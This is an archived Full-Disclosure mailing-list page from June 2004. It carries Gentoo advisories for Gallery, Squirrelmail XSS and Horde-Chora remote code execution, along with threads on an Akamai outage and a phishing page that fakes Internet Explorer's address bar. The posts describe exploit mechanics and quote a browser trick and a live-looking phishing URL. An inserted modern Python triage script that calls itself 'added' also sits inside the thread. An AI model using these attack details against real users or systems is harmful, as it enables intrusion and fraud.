http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Gallery: Privilege escalation vulnerability
Date: June 15, 2004
Bugs: #52798
ID: 200406-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
There is a vulnerability in the Gallery photo album software which may
allow an attacker to gain administrator privileges within Gallery.
Background
==========
Gallery is a web application written in PHP which is used to organize
and publish photo albums. It allows multiple users to build and
maintain their own albums. It also supports the mirroring of images on
other servers.
Affected packages
=================
-------------------------------------------------------------------
     Package                  /  Vulnerable       /  Unaffected
-------------------------------------------------------------------
  1  app-misc/gallery            <= 1.4.3_p1          >= 1.4.3_p2
Description
===========
There is a vulnerability in the Gallery photo album software which may
allow an attacker to gain administrator privileges within Gallery. A
Gallery administrator has full access to all albums and photos on the
server, thus attackers may add or delete photos at will.
Impact
======
Attackers may gain full access to all Gallery albums. There is no risk
to the webserver itself, or the server on which it runs.
Workaround
==========
There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.
Resolution
==========
All users should upgrade to the latest available version of Gallery.
# emerge sync
# emerge -pv ">=app-misc/gallery-1.4.3_p2"
# emerge ">=app-misc/gallery-1.4.3_p2"
References
==========
[ 1 ] Gallery Announcement
http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=123&mode=thread&order=0&thold=0
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200406-10.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/1.0
[Full-Disclosure] Administrivia: Classical Rant
From: Len Rose (len@netsys.com)
Date: Tue Jun 15 2004 - 13:52:11 CDT
ATTENTION LAMERS
Speaking for myself only, something has to be done
about the quality of the information, and the standards
of netiquette on this list.
We all don't need to see mindless banter, and other noise
spewing back and forth. If you can, please try to not post
this spewage to the list, but instead send mail to each other
(after carefully cutting and pasting on your windows desktop).
If you must send it to the list it must be in terms of
technical content, whether it is of a real security issue
and not if Yahoo will increase your disk space or what slashdorks
posted about something that was known since 2 months ago.
I use the word technical loosely as in my mind, anything
security related is inherently technical even if it is not
actually dealing with code or networks or systems.
I'm very sick of seeing the amount of lame crap on this list,
and I imagine a great deal of others are too.
Thanks for listening.
PS Unlike other "reputable" lists, we try not to censor
anyone if they at least subscribe and never hit the
queue. Lately we default to "delete" and try to approve
those people who insist on posting without subscribing,
or posting from a non-subscribed address. If "reputable"
means bugtraq or cert then beat me with a stick.
[Full-Disclosure] [ GLSA 200406-08 ] Squirrelmail: Another XSS vulnerability
From: Thierry Carrez (koon@gentoo.org)
Date: Tue Jun 15 2004 - 14:00:27 CDT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Squirrelmail: Another XSS vulnerability
Date: June 15, 2004
Bugs: #52434
ID: 200406-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Squirrelmail fails to properly sanitize user input, which could lead to
a compromise of webmail accounts.
Background
==========
SquirrelMail is a webmail package written in PHP. It supports IMAP and
SMTP, and can optionally be installed with SQL support.
Affected packages
=================
-------------------------------------------------------------------
     Package                      /  Vulnerable         /  Unaffected
-------------------------------------------------------------------
  1  mail-client/squirrelmail        <= 1.4.3_rc1-r1       >= 1.4.3
Description
===========
A new cross-site scripting (XSS) vulnerability in
Squirrelmail-1.4.3_rc1 has been discovered. In functions/mime.php
Squirrelmail fails to properly sanitize user input.
Impact
======
By enticing a user to read a specially crafted e-mail, an attacker can
execute arbitrary scripts running in the context of the victim's
browser. This could lead to a compromise of the user's webmail account,
cookie theft, etc.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All SquirrelMail users should upgrade to the latest stable version:
# emerge sync
# emerge -pv ">=mail-client/squirrelmail-1.4.3"
# emerge ">=mail-client/squirrelmail-1.4.3"
References
==========
[ 1 ] RS-Labs Advisory
http://www.rs-labs.com/adv/RS-Labs-Advisory-2004-1.txt
[ 2 ] CERT description of XSS
http://www.cert.org/advisories/CA-2000-02.html
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200406-08.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/1.0
Re: [Full-Disclosure] Yahoo upgraded all accounts to 100MB
From: randall (lists@domain-logic.com)
Date: Tue Jun 15 2004 - 14:28:19 CDT
At 11:35 AM 6/15/2004 -0500, you wrote:
>Perhaps it is for users who have been with Yahoo for a really long time? I
>just checked and mine has been upgraded to 100Mb.
>
>Actually, I wasn't too worried about it because for several months now
>their quota on my account has been broken! It always said 92% of capacity
>even when I knew I had well over the allotted quota.
>
>-joe
Go to mail.yahoo.com and see:
New to Yahoo?
<blah blah blah?
- 100MB of email storage
Keep more of what's important to you
- Powerful spam protection
Read only the mail you really want
- Get your mail anywhere
All you need is a web connection
--
seems to be part of the basic offering.
Randall
Jesus is Coming! Look Busy!
[Full-Disclosure] [ GLSA 200406-09 ] Horde-Chora: Remote code execution
From: Thierry Carrez (koon@gentoo.org)
Date: Tue Jun 15 2004 - 14:07:19 CDT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Horde-Chora: Remote code execution
Date: June 15, 2004
Bugs: #53800
ID: 200406-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
A vulnerability in Chora allows remote code execution and file upload.
Background
==========
Chora is a PHP-based SVN/CVS repository viewer by the HORDE project.
Affected packages
=================
-------------------------------------------------------------------
     Package                  /  Vulnerable       /  Unaffected
-------------------------------------------------------------------
  1  net-www/horde-chora          < 1.2.2              >= 1.2.2
Description
===========
A vulnerability in the diff viewer of Chora allows an attacker to
inject shellcode. An attacker can exploit PHP's file upload
functionality to upload a malicious binary to a vulnerable server,
chmod it as executable, and run the file.
Impact
======
An attacker could remotely execute arbitrary binaries with the
permissions of the PHP script, conceivably allowing further
exploitation of local vulnerabilities and remote root access.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All users are advised to upgrade to the latest version of Chora:
# emerge sync
# emerge -pv ">=net-www/horde-chora-1.2.2"
# emerge ">=net-www/horde-chora-1.2.2"
References
==========
[ 1 ] e-matters Advisory
http://security.e-matters.de/advisories/102004.html
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200406-09.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/1.0
Re: [Full-Disclosure] antivirus and spyware scanning
From: randall (lists@domain-logic.com)
Date: Tue Jun 15 2004 - 14:36:10 CDT
At 09:43 AM 6/15/2004 -0700, you wrote:
> > I think it is very useful to scan a windows machine
> > from viruses while having that machine booted to
> > linux. This pretty much ensures that you will find
> > all the virii on that system.
>Not necessarily. You'll have to update the virus
>signatures on your CD distribution prior to scanning,
>and that doesn't guarantee complete coverage, either.
I like to just plug the box into my network (home or office)
and scan the entire drive from another box.
If you remove a known infected drive and actually place
it into your own machine, your system is vulnerable until
your antivirus software shields are up and running.
Booting from a CD may require changing BIOS settings,
or the machine may be old enough (I still come across
companies running these) that it will not boot from CD.
You can also carry along your laptop and crossover cable
to scan 'on the road' without much setup.
I think a more useful setup for me (on newer machines)
would be to create a Linux bootable USB thumbdrive that
I could boot and scan from. Updating signatures would
be trivial.
randall
Blaming guns for crime is like blaming a pencil for misspelled words
Re: [Full-Disclosure] Akamai
From: james edwards (hackerwacker@cybermesa.com)
Date: Tue Jun 15 2004 - 15:44:45 CDT
> I've just been told that it was a DoS. No details.
Unlikely, Akamai is an overlay network & the root content node is not
reachable.
Akamai can in real time spread web traffic throughout their global network
of servers, diluting a DoS to the point it is not significant. It is more
likely that the complexity of the overlay network was the cause. Last week
it was a DNS issue and it seemed much the same this week. Provided you know
the IPs of the content servers you would find they were still up. At least
that was what I was seeing.
Here is some info on Overlay Networks:
http://nms.lcs.mit.edu/ron/
http://nms.lcs.mit.edu/ron/#papers
Dr. Anderson's "Mayday: Distributed Filtering for Internet Services"
is quite interesting.
http://nms.lcs.mit.edu/papers/mayday-usits2003/paper.html
--
James H. Edwards
Routing and Security Administrator
At the Santa Fe Office: Internet at Cyber Mesa
jamesh@cybermesa.com
noc@cybermesa.com
(505) 795-7101
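The distinction James draws above, names that stop resolving versus content nodes that stop answering on their known addresses, can be checked from the outside. The following triage helper is an added example, not code from the thread or from Akamai; the hostname and the 192.0.2.x addresses are constructed documentation-range placeholders, and the resolver and connector are injectable so the constructed scenarios run offline.

```python
"""Outage triage for a CDN-fronted site: did the name service fail, or the
content nodes? (Added example; not code from the thread or from Akamai.)"""
import socket
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed placeholders: documentation-range addresses, not real CDN nodes.
DEMO_HOST = "www.example.net"
KNOWN_CONTENT_IPS = ["192.0.2.10", "192.0.2.11"]

VERDICT_HEALTHY = "healthy: name resolves and the resolved nodes answer"
VERDICT_DNS = "name service failure: name does not resolve, known nodes still answer"
VERDICT_CONTENT = "content node failure: name resolves but the nodes do not answer"
VERDICT_BOTH = "name service and known content nodes both unreachable"


@dataclass
class Observation:
    hostname: str
    known: List[str]            # content-node IPs recorded while things worked
    resolved: List[str]         # what the name resolves to right now ([] on failure)
    dns_error: Optional[str]    # resolver error text, None when resolution worked
    reachable: Dict[str, bool]  # ip -> TCP connect to port 80 succeeded
    verdict: str = ""


def default_resolve(hostname: str) -> List[str]:
    """System resolver; raises OSError (socket.gaierror) when the name fails."""
    infos = socket.getaddrinfo(hostname, 80, type=socket.SOCK_STREAM)
    return sorted({info[4][0] for info in infos})


def default_connect(ip: str, port: int = 80, timeout: float = 3.0) -> bool:
    """True when a TCP handshake to ip:port completes within the timeout."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False


def classify(obs: Observation) -> str:
    """Separate the two failure modes argued over in the thread."""
    if obs.dns_error is None:
        resolved_up = [ip for ip in obs.resolved if obs.reachable.get(ip)]
        return VERDICT_HEALTHY if resolved_up else VERDICT_CONTENT
    known_up = [ip for ip in obs.known if obs.reachable.get(ip)]
    return VERDICT_DNS if known_up else VERDICT_BOTH


def triage(hostname, known_ips, resolve=default_resolve,
           connect=default_connect) -> Observation:
    try:
        resolved = resolve(hostname)
        dns_error = None if resolved else "empty answer"
    except OSError as exc:
        resolved, dns_error = [], (str(exc) or exc.__class__.__name__)
    # Probe both what DNS says now and what we knew before: an overlay may
    # have remapped the name to other nodes, which is not itself a failure.
    targets = sorted(set(resolved) | set(known_ips))
    reachable = {ip: bool(connect(ip)) for ip in targets}
    obs = Observation(hostname, list(known_ips), resolved, dns_error, reachable)
    obs.verdict = classify(obs)
    return obs


def scenario_name_service_down() -> Observation:
    """Constructed: the resolver times out, but the known nodes still answer."""
    def resolve(_name):
        raise OSError("constructed: resolver timed out")
    return triage(DEMO_HOST, KNOWN_CONTENT_IPS, resolve=resolve,
                  connect=lambda ip, port=80, timeout=3.0: ip in KNOWN_CONTENT_IPS)


def scenario_content_down() -> Observation:
    """Constructed: the name resolves normally, but nothing answers on port 80."""
    return triage(DEMO_HOST, KNOWN_CONTENT_IPS,
                  resolve=lambda _name: list(KNOWN_CONTENT_IPS),
                  connect=lambda ip, port=80, timeout=3.0: False)


def scenario_remapped_but_healthy() -> Observation:
    """Constructed: the overlay now points the name at a different node, which
    answers, while the old nodes are gone. That is steering, not an outage."""
    return triage(DEMO_HOST, KNOWN_CONTENT_IPS,
                  resolve=lambda _name: ["192.0.2.12"],
                  connect=lambda ip, port=80, timeout=3.0: ip == "192.0.2.12")


if __name__ == "__main__":
    for scenario in (scenario_name_service_down, scenario_content_down,
                     scenario_remapped_but_healthy):
        obs = scenario()
        print(f"{scenario.__name__:30s} -> {obs.verdict}")
```

Against a live site, call triage() with the default resolver and connector and the node addresses you recorded while the site was healthy.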
RE: [Full-Disclosure] Akamai
From: Brent Colflesh (Brent.Colflesh@Ulticom.com)
Date: Tue Jun 15 2004 - 16:30:19 CDT
"Young called it a "large scale, international attack on Internet
infrastructure." However, there was no evidence that non-Akamai
infrastructure was affected."
http://apnews.excite.com/article/20040615/D837KIU00.html
Regards,
Brent
-----Original Message-----
From: full-disclosure-admin@lists.netsys.com [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of james edwards
Sent: Tuesday, June 15, 2004 4:45 PM
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Akamai
> I've just been told that it was a DoS. No details.
Unlikely, Akamai is an overlay network & the root content node is not
reachable.
Akamai can in real time spread web traffic throughout their global network
of servers, diluting a DoS to the point it is not significant. It is more
likely that the complexity of the overlay network was the cause. Last week
it was a DNS issue and it seemed much the same this week. Provided you know
the IPs of the content servers you would find they were still up. At least
that was what I was seeing.
Here is some info on Overlay Networks:
http://nms.lcs.mit.edu/ron/
http://nms.lcs.mit.edu/ron/#papers
Dr. Anderson's "Mayday: Distributed Filtering for Internet Services"
is quite interesting.
http://nms.lcs.mit.edu/papers/mayday-usits2003/paper.html
--
James H. Edwards
Routing and Security Administrator
At the Santa Fe Office: Internet at Cyber Mesa
jamesh@cybermesa.com
noc@cybermesa.com
(505) 795-7101
Re: [Full-Disclosure] Akamai
From: scosol (scosol@scosol.org)
Date: Tue Jun 15 2004 - 16:37:24 CDT
james edwards wrote:
>>I've just been told that it was a DoS. No details.
>
>
> Unlikely, Akamai is an overlay network & the root content node is not
> reachable.
> Akamai can in real time spread web traffic throughout their global network
> of servers, diluting a DoS to the point it is not significant. It is more
> likely that the complexity of the overlay network was the cause. Last week
> it was a DNS issue and it seemed much the same this week.
I don't think so- yeah a DOS against the content nodes isn't gonna do
much but a DOS against their nameservers is fully workable.
--
"jupiter accepts your offer"
AIM: IMFDUP
http://www.scosol.org/
RE: [Full-Disclosure] Akamai
From: Chris Carlson (chris@compucounts.com)
Date: Tue Jun 15 2004 - 16:47:07 CDT
http://www.washingtonpost.com/wp-dyn/articles/A43635-2004Jun15.html
Need to register, but it's no hassle.
I'd mirror to my server, but copyright blah blah blah.
Anyone have any more info?
> -----Original Message-----
> From: full-disclosure-admin@lists.netsys.com
> [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of
> james edwards
> Sent: Tuesday, June 15, 2004 16:45
> To: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] Akamai
>
> > I've just been told that it was a DoS. No details.
>
> Unlikely, Akamai is an overlay network & the root content
> node is not reachable.
> Akamai can in real time spread web traffic throughout their
> global network of servers, diluting a DoS to the point it is
> not significant. It is more likely that the complexity of the
> overlay network was the cause. Last week it was a DNS issue
> and it seemed much the same this week. Provided you know the
> IPs of the content servers you would find they were still
> up. At least that was what I was seeing.
>
> Here is some info on Overlay Networks:
> http://nms.lcs.mit.edu/ron/
> http://nms.lcs.mit.edu/ron/#papers
>
> Dr. Anderson's "Mayday: Distributed Filtering for Internet Services"
> is quite interesting.
> http://nms.lcs.mit.edu/papers/mayday-usits2003/paper.html
>
> --
> James H. Edwards
> Routing and Security Administrator
> At the Santa Fe Office: Internet at Cyber Mesa
> jamesh@cybermesa.com noc@cybermesa.com
> (505) 795-7101
Re: [Full-Disclosure] Akamai
From: Ben Nelson (lists@venom600.org)
Date: Tue Jun 15 2004 - 16:44:29 CDT
Keep in mind that the term 'DOS' doesn't necessarily mean 'flood of
traffic'. A denial of service is just that......a _denial of service_
by any means, and I'd say that there was definitely some service being
denied. Don't think so?.....ask Google or Yahoo.
- --Ben
james edwards wrote:
|>I've just been told that it was a DoS. No details.
|
|
| Unlikely, Akamai is an overlay network & the root content node is not
| reachable.
| Akamai can in real time spread web traffic throughout their global
| network of servers, diluting a DoS to the point it is not significant.
| It is more likely that the complexity of the overlay network was the
| cause. Last week it was a DNS issue and it seemed much the same this
| week. Provided you know the IPs of the content servers you would find
| they were still up. At least that was what I was seeing.
|
| Here is some info on Overlay Networks:
| http://nms.lcs.mit.edu/ron/
| http://nms.lcs.mit.edu/ron/#papers
|
| Dr. Anderson's "Mayday: Distributed Filtering for Internet Services"
| is quite interesting.
| http://nms.lcs.mit.edu/papers/mayday-usits2003/paper.html
|
Re: [Full-Disclosure] US Bank scam
From: Hamby, Charles D. (pfcdh1@matsu.alaska.edu)
Date: Tue Jun 15 2004 - 16:54:57 CDT
This is a slick phishing scam, I have to admit. One thing I noticed,
though: I printed the various pages of the website out with IE to use as
an example and I noticed that the real URL appeared at the bottom of each
page as opposed to the bogus one. I thought that was interesting. Has
anyone else noticed that this occurs with other phishing sites or is it
just unique to this case?
Charles Hamby
-----Original Message-----
From: full-disclosure-admin@lists.netsys.com [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of Eric LeBlanc
Sent: Tuesday, June 15, 2004 9:59 AM
To: full-disclosure@lists.netsys.com
Subject: [SPAM] - Re: [Full-Disclosure] US Bank scam - Email found in subject
On Tue, 15 Jun 2004, David Lederman wrote:
> This is the best phishing scam I've seen yet:
> http://www.bis1bp.com/a12/index.html
>
> I have Windows Server 2003 fully patched and this works. The program
> fakes an address bar so this would pass through most people's safety
> check, after all the address bar clearly has the correct address.
>
> There are bugs in the code, for example, all your Internet Explorer
> windows will now have this address, but again for most people would only
> have one window open.
>
If you have google's toolbar or something similar, it will overwrite this
toolbar and not the address bar.
But, I must admit that this thing is ingenious !
E.
--
Eric LeBlanc
inouk@igt.net
--------------------------------------------------
UNIX is user friendly.
It's just selective about who its friends are.
==================================================
Re: [Full-Disclosure] Akamai
From: james edwards (hackerwacker@cybermesa.com)
Date: Tue Jun 15 2004 - 16:43:49 CDT
Akamai is saying their DNS continued to work.
http://www.theregister.co.uk/2004/06/15/akamai_goes_postal/
Akamai has got back to us to explain that the problem stemmed from what a
spokesman called a "large scale international attack on the Internet's
infrastructure". Akamai said the attack was primarily aimed at the large
search engines - of which it runs the three largest, Yahoo!, Google and
Lycos - which meant that people were unable to access the sites.
The spokesman denied however that it was an outage and ****said that the
Akamai name service continued to function throughout the attack**** which
ended around two hours later.
RE: [Full-Disclosure] US Bank scam
From: Peter B. Harvey (Information Security) (peterharvey@emergency.qld.gov.au)
Date: Tue Jun 15 2004 - 17:30:47 CDT
Couple of notes,
First the page is not encrypted.
Second the overlay stays on top when you switch windows. At the moment it is sitting in the middle of the email I am typing.
However a novice to computer scams could be fooled quite easily by this. Impressive.
Peter
____________________________________________
Peter Harvey
Information Security Officer
Dept. Emergency Services - QLD
Phone: +61 7 3109 7292
____________________________________________
-----Original Message-----
From: Eric LeBlanc [mailto:inouk@igt.net]
Sent: Wednesday, June 16, 2004 3:59 AM
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] US Bank scam
On Tue, 15 Jun 2004, David Lederman wrote:
> This is the best phishing scam I've seen yet:
> http://www.bis1bp.com/a12/index.html
>
> I have Windows Server 2003 fully patched and this works. The program fakes an address bar so this
> would pass through most people's safety check, after all the address bar clearly has the correct
> address.
>
> There are bugs in the code, for example, all your Internet Explorer windows will now have this
> address, but again for most people would only have one window open.
>
If you have google's toolbar or something similar, it will overwrite this
toolbar and not the address bar.
But, I must admit that this thing is ingenious !
E.
--
Eric LeBlanc
inouk@igt.net
--------------------------------------------------
UNIX is user friendly.
It's just selective about who its friends are.
==================================================
Re: [Full-Disclosure] Akamai
From: james edwards (hackerwacker@cybermesa.com)
Date: Tue Jun 15 2004 - 17:20:53 CDT
> "Young called it a "large scale, international attack on Internet
> infrastructure." However, there was no evidence that non-Akamai
> infrastructure was affected."
>
> http://apnews.excite.com/article/20040615/D837KIU00.html
>
> Regards,
> Brent
With an attack of this indicated size, there are always choke points
just prior to the DoS traffic hitting the intended hosts. These choke points
tend to be NAPs or IXes. The real harm gets done at these points, where
the DoS converges. So far no one has spoken up on NANOG with issues
at NAPs or IXes. With the last big DDoS of the DNS roots, the roots never
went down; it was the access points just prior to the roots that took the
beating. I had no problems with any east or west coast NAPs or IXes this
morning, nor were any problems reported on NANOG.
james
Re: [Full-Disclosure] Akamai
From: james edwards (hackerwacker@cybermesa.com)
Date: Tue Jun 15 2004 - 18:06:54 CDT
> Keep in mind that the term 'DOS' doesn't necessarily mean 'flood of
> traffic'. A denial of service is just that......a _denial of service_
> by any means, and I'd say that there was definitely some service being
> denied. Don't think so?.....ask Google or Yahoo.
>
> - --Ben
Actually I did not say this part:
>
> james edwards wrote:
> |>I've just been told that it was a DoS. No details.
I would agree that a DoS can be many things. But if you are able to read
for context, it is clear the below is speaking of a DoS in the flood of
traffic context.
This part is me:
> |
> |
> | Unlikely, Akamai is an overlay network & the root content node is not
> | reachable.
> | Akamai can in real time spread web traffic throughout their global
> | network of servers, diluting a DoS to the point it is not significant.
> | It is more likely that the complexity of the overlay network was the
> | cause. Last week it was a DNS issue and it seemed much the same this
> | week. Provided you know the IPs of the content servers you would find
> | they were still up. At least that was what I was seeing.
> |
> | Here is some info on Overlay Networks:
> | http://nms.lcs.mit.edu/ron/
> | http://nms.lcs.mit.edu/ron/#papers
> |
> | Dr. Anderson's "Mayday: Distributed Filtering for Internet Services"
> | is quite interesting.
> | http://nms.lcs.mit.edu/papers/mayday-usits2003/paper.html
> |
Re: [Full-Disclosure] Akamai
From: james edwards (hackerwacker@cybermesa.com)
Date: Tue Jun 15 2004 - 18:21:07 CDT
>
> I don't think so- yeah a DOS against the content nodes isn't gonna do
> much but a DOS against their nameservers is fully workable.
Akamai seems to be saying the NS was functioning:
The spokesman denied however that it was an outage and ****said that the
Akamai name service continued to function throughout the attack**** which
ended around two hours later.
RE: [Full-Disclosure] Akamai
From: Bob Beringer (bob.beringer@usa.net)
Date: Tue Jun 15 2004 - 18:38:08 CDT
All,
Just found this site: http://bugmenot.com/
It will help you bypass registration, if you would like :-)
v/r
Bob Beringer
"Chris Carlson" <chris@compucounts.com> wrote:
http://www.washingtonpost.com/wp-dyn/articles/A43635-2004Jun15.html
Need to register, but it's no hassle.
I'd mirror to my server, but copyright blah blah blah.
Anyone have any more info?
> -----Original Message-----
> From: full-disclosure-admin@lists.netsys.com
> [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of
> james edwards
> Sent: Tuesday, June 15, 2004 16:45
> To: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] Akamai
>
> > I've just been told that it was a DoS. No details.
>
> Unlikely, Akamai is an overlay network & the root content
> node is not reachable.
> Akamai can in real time spread web traffic through out their
> global network of servers, diluting a DoS to the point it is
> not significant. It is more likely that the complexity of the
> overlay network was the cause. Last week it was a DNS issue
> and it seemed much the same this week. Provided you know the
> IP's of the content servers you would find they were still
> up. At least that was what I was seeing.
>
> Here is some info on Overlay Networks:
> http://nms.lcs.mit.edu/ron/
> http://nms.lcs.mit.edu/ron/#papers
>
> Dr. Anderson's "Mayday: Distributed Filtering for Internet Services "
> is quite interesting.
> http://nms.lcs.mit.edu/papers/mayday-usits2003/paper.html
>
> --
> James H. Edwards
> Routing and Security Administrator
> At the Santa Fe Office: Internet at Cyber Mesa
> jamesh@cybermesa.com, noc@cybermesa.com
> (505) 795-7101
>
RE: [Full-Disclosure] US Bank scam
From: Scott Dodson (sdodson@sdodson.com)
Date: Tue Jun 15 2004 - 18:24:54 CDT
> -----Original Message-----
> From: full-disclosure-admin@lists.netsys.com
> [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of David
> Lederman
> Sent: Tuesday, June 15, 2004 12:30 PM
> To: full-disclosure@lists.netsys.com
> Subject: [Full-Disclosure] US Bank scam
>
> This is the best phishing scam I've seen yet:
> http://www.bis1bp.com/a12/index.html
>
> I have Windows Server 2003 fully patched and this works. The program
> fakes an address bar so this would pass through most people's safety
> check, after all the address bar clearly has the correct address.
> There are bugs in the code, for example, all your Internet Explorer
> windows will now have this address, but again for most people would
> only have one window open.
>
With XP SP2 build 2149 (RC2) it shows up immediately below the address
bar.
http://www.sdodson.com/phishing.jpg for a view.
--
Scott
[Full-Disclosure] RE: Internet Explorer Remote Null Pointer Crash(mshtml.dll)
From: http-equiv@excite.com
Date: Tue Jun 15 2004 - 19:12:11 CDT
This is all incorrect.
1. Any unusual characters in a file name will automatically be
converted to random digits. This has been tested and
demonstrated since 2001.
2. 'Save target' and an invoked download whether automatic or
manually cannot be the same. Simple logic right click on a
15MB .mp3 and 'save target' and you don't wait hours for this
to occur. Neither does forcing the download which only downloads
the html or php or script or whatever trick is used initially to
auto download nor does directly invoking the download [clicking
on the file]. Regardless of the way, nothing is written.
3. Clearly what's being 'confused' here is with a frame which
does write the file and which cannot be combined with this
scenario for all the reasons above.
4. document.execCommand('SaveAs',false,'::%7b') also doesn't do
anything.
We may actually have to roll up our sleeves and get our soft
little hands dirty to solve this one what.
--
http://www.malware.com
Re: [Full-Disclosure] US Bank scam
From: Nick FitzGerald (nick@virus-l.demon.co.uk)
Date: Tue Jun 15 2004 - 20:03:14 CDT
"Hamby, Charles D." <pfcdh1@matsu.alaska.edu> wrote:
> This is a slick phishing scam, I have to admit. ...
It's been around for a month or more, so it may be slick, but it's not
new... Back on 13 May Drew Copley from eEye posted the following to
Bugtraq about it:
http://www.securityfocus.com/archive/1/363326
http://www.securityfocus.com/archive/1/363350
It is listed as BID 10346 at securityfocus:
http://www.securityfocus.com/bid/10346
> ... One thing I noticed
> though;
> I printed the various pages of the website out with IE to use as an
> example and I noticed that the real URL appeared at the bottom of each
> page as opposed to the bogus one. I thought that was interesting. Has
> anyone else
> noticed that this occurs with other phishing sites or is it just unique
> to this case?
For pity's sake -- did you not even look at the page sources to see how
it works??
It slaps a fake URL window over roughly the screen area where the real
URL is still displayed in the address bar. This is _NOT_ a case of
"true" spoofing (in the sense that the browser is fooled -- note for
one that the "https padlock" is not present; IE knows it is not at an
https URL), so why would you think that IE might print the "spoofed"
URL in printed headers/footers?
The spoofing here is of the social engineering type. Clearly all those
who have posted to the list so far commenting how effective this is are
not the types to immediately notice the horrible, and to me immediately
noticeable, two or three pixel offset of the faked URL window...
Finally, this is the kind of problem that is relatively easily guarded
against (though not entirely protected from) by running non-default
configurations. To the extent you have the Address bar in IE
positioned somewhere other than where the default location is, this
"trick" becomes horribly obvious, so long as your users have the
requisite clue count...
(And yes, there are other ways to do this that are not so easily fooled
as to show themselves by simply moving the Address bar, and these have
reputedly already been used in some phishing scams -- see commentary in
Drew's archived posts, linked above.)
--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
Re: [Full-Disclosure] Akamai
From: scosol (scosol@scosol.org)
Date: Tue Jun 15 2004 - 20:36:13 CDT
james edwards wrote:
>>I don't think so- yeah a DOS against the content nodes isn't gonna do
>>much but a DOS against their nameservers is fully workable.
>
>
> Akamai seems to be saying the NS was functioning:
>
> The spokesman denied however that it was an outage and ****said that the
> Akamai name service continued to function throughout the attack**** which
> ended around two hours later.
That's BS-
See these Symantec and Apple graphs- the outage was clearly at the DNS
level:
http://anon.scosol.speedera.net/anon.scosol/apple_outage.png
http://anon.scosol.speedera.net/anon.scosol/symantec_outage.png
It's my 24/7 job to monitor Akamai :)
RE: [Full-Disclosure] US Bank scam
From: Nick FitzGerald (nick@virus-l.demon.co.uk)
Date: Tue Jun 15 2004 - 20:54:04 CDT
"Scott Dodson" <sdodson@sdodson.com> wrote:
> With XP SP2 build 2149 (RC2) it shows up immediately below the address
> bar.
Yes -- XP SP2 includes a lot of fixes for IE, such as preventing it
drawing client windows over parts of the standard interface,
limitations on chromeless windows and so on...
--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
Re: [Full-Disclosure] Akamai
From: Darren Reed (avalon@caligula.anu.edu.au)
Date: Tue Jun 15 2004 - 20:53:23 CDT
> "Young called it a "large scale, international attack on Internet
> infrastructure." However, there was no evidence that non-Akamai
> infrastructure was affected."
>
> http://apnews.excite.com/article/20040615/D837KIU00.html
>
> Regards,
> Brent
I'm curious to know if organised crime was involved, or was it
some rogue hacker/group, or just a technical glitch?
Reports say the attack stopped after ~2 hours, but why?
Someone must have "called it off", but in response to what?
If so, was it just a demonstration of "power" or something else?
After reading about extortion attempts by various groups that use
DoS tactics to impact web sales, clearly the nature of all DoS
attacks against large sites must be looked at in more depth to
get a good picture of what is happening.
This is a whole new play ground for organised crime, mostly thanks
to Microsoft. You've got millions of PC's around the world that
are largely, in one way or another, susceptible to computer virii,
